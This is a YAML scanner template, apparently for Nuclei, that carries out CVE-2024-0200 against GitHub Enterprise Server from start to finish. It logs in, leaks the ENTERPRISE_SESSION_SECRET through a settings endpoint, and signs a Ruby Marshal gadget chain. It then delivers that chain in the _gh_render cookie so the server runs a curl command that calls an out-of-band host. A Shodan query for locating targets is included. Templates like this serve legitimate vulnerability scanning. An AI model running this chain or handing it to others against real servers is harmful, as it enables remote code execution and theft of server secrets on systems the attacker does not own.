2024-05-09 11:09:50 +00:00
id : CVE-2024-0200
info :
name : Github Enterprise Authenticated Remote Code Execution
author : iamnoooob,rootxharsh,pdresearch
severity : critical
description : |
2024-05-09 11:14:16 +00:00
An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.
2024-05-09 11:09:50 +00:00
reference :
- https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/
- https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/
- https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5
- https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3
- https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2024-0200
cwe-id : CWE-470
epss-score : 0.0037
epss-percentile : 0.72517
cpe : cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
metadata :
vendor : github
product : enterprise_server
shodan-query : title:"GitHub Enterprise"
fofa-query : app="Github-Enterprise"
verified : true
tags : cve,cve2024,rce,github,enterprise
variables :
username : "{{username}}"
password : "{{password}}"
oast : "curl {{interactsh-url}}/?"
padstr : "{{randstr}}"
payload : '{{padding(oast,padstr,300)}}'
marshal_data : '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT'
b64_marshal_data : "{{base64(url_decode(marshal_data))}}"
digest : "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}"
2024-05-09 11:14:16 +00:00
final_payoad : "{{ b64_marshal_data + '--' + digest}}"
2024-05-09 11:09:50 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/api/v3/user/orgs"
headers :
Authorization : "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
extractors :
- type : json
part : body
name : org_name
internal : true
json :
- ".[].login"
- method : GET
path :
- "{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"
headers :
Authorization : "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
matchers-condition : and
matchers :
- type : word
words :
- '"role": "admin"'
part : body
- method : POST
path :
- "{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"
headers :
Content-Type : application/json
Authorization : "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
body : |
{
"name": "{{randstr}}"
}
matchers :
- type : status
status :
- 201
- method : GET
cookie-reuse : true
path :
- "{{BaseURL}}/login"
extractors :
- type : regex
part : body
internal : true
group : 1
regex :
- 'name="authenticity_token" value="(.*?)"'
name : csrf_token
- method : POST
path :
- "{{BaseURL}}/session"
headers :
Content-Type : application/x-www-form-urlencoded
body : |
login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&
matchers :
- type : status
status :
- 302
- type : word
words :
- "_gh_render"
part : header
- method : GET
path :
- "{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"
extractors :
- type : regex
group : 1
name : ghe_secret
internal : true
regex :
- '"ENTERPRISE_SESSION_SECRET"=>"([^"]+?)"'
part : body
matchers :
- type : word
words :
- 'ENTERPRISE_SESSION_SECRET'
part : body
- method : GET
path :
- "{{BaseURL}}/"
headers :
Cookie : _gh_render={{final_payoad}}
matchers-condition : and
matchers :
- type : status
status :
- 500
- type : word
part : interactsh_protocol
words :
- "dns"
2024-05-11 09:32:42 +00:00
# digest: 4b0a004830460221008cb530b7dece20ef5b28664e52e4b5123c761007f8a3021c46963b66706b95f8022100ba710c3a1d763987eb9872637d45f542155a84506b437d9e360f973235902443:922c64590222798bb761d5b6d8e72950